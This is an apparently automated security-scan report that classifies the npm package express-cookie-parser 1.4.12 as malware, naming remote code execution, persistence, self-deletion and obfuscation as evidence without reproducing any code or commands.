This analysis was performed using vet and SafeDep Cloud Malicious Package Analysis. Integrate with GitHub using vet-action GitHub Action.
Remote code execution, persistence, self-deletion, and obfuscation found in the package's code confirm its malicious nature.
The package express-cookie-parser (version 1.4.12) exhibits strong indicators of malicious behavior based on the LLM-based file analysis. Evidence 0, 1, and 2 reveal critical functionalities: remote code execution from a GitHub URL (Evidence 0), persistence through the creation of a startup script (Evidence 1), and self-deletion to hinder analysis (Evidence 2). These actions, combined with obfuscation techniques (Evidence 3) to mask the malicious intent, strongly suggest malicious activity. While the lack of project information (Evidence 4) is concerning and increases suspicion, the LLM findings are sufficient to classify this package as malware. The remote code execution capability alone is a significant threat, allowing an attacker to compromise systems and execute arbitrary code. The persistence mechanism ensures the malware's survival even after a reboot. The self-deletion attempts to evade detection and analysis. The combination of these factors makes this a clear case of malicious software.